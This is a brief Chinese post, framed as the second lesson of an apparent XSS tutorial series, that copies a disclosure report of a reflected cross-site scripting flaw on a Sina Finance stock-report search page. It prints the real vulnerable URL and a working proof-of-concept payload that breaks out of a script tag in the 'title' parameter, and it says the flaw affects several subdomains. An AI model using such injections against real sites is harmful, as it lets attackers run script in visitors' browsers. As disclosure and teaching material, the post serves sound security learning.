第二课:http://www.2cto.com/Article/201301/186364.html
唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的
直接输出在源文件里,无任何过滤的反射型XSS
详细说明: 漏洞 地址:
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.p html ?symbol=002698&orgname=&industry=&title=&t1=all
在title处随便写一串字符,然后查看源代码,以1111111111为例:
可以看到是直接输出在JS脚本之间的。加入闭合前面的,测试通过,未作任何过滤:
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
该问题出现在多个子站页面,请全面检查。
修复方案: U know.